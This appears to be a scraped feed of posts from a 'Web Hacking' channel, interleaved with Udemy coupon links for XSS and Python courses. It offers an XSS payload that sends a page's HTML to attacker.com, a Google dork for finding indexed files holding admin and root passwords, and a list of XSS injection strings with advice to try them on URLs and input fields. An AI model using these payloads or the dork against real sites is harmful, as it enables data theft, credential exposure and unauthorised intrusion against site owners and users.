Web Hacking
🎯 A payload that sends the current webpage to a remote server

<svg/onload="(new Image()).src='//attacker.com/'%2Bdocument.documentElement.innerHTML">
🎯 Want administrator's creds? Google has indexed them for you:

intext:company_keyword & ext:txt | ext:sql | ext:cnf | ext:config | ext:log & intext:"admin" | intext:"root" | intext:"administrator" & intext:"password" | intext:"root" | intext:"admin" | intext:"administrator"
Master in Hacking with XSS Cross Site Scripting

Learn the most common flaws in web applications

https://www.udemy.com/xss-cross-site-scripting/?couponCode=ONE_LAKH_FREE
Python Essentials | Mastering Programming with Python

Learn and Master modern Python Fast, know how it works with examples and dive deep into it in a short time.

https://www.udemy.com/python-essentials-mastering-programming-with-python/?couponCode=PI314DIR5P10

@WebHacking
Here's a small #XSS list for manual testing (main cases, high success rate).

"><img src onerror=alert(1)>
"autofocus onfocus=alert(1)//
</script><script>alert(1)</script>
'-alert(1)-'
\'-alert(1)//
javascript:alert(1)

Try it on:
- URL query, fragment & path;
- all input fields.
Here's an updated polyglot that uses the details tag and now breaks out of template strings too.